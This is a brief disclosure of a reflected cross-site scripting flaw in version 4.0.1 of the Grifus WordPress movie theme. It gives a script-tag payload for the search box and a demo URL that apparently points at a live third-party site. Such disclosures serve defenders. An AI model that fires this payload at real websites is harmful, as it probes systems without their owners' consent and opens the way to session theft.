WordPress Grifus theme version 4.0.1 suffers from a cross site scripting vulnerability.
e9afb3cf60c90dfd8072595f8efd0b8b44b80320c8f00ad18b4c3c3d7b284f3c
======
Title: Grifus WordPress Themes XSS Vuln
Version: 4.0.1
Homepage: https://mundothemes.com/grifus/
=======
Description
================
Grifus WordPress theme For movies Web
POC:
========
1. Go To Terget Web
2. Click Search box
3. Now Give This Payload in Search box "
<script>prompt(document.domain)</script>
"
4. Now See xss Will be Exclude
Demo:
======
http://download.lakshmipuronline.com/?s=%3Cscript%3Eprompt%28document.
domain%29%3C%2Fscript%3E
Mitigations
================
Update Your Themes
--
Thanks
Sajibe Kanti
Independent Web Security Researcher <https://twitter.com/Sajibekantibd>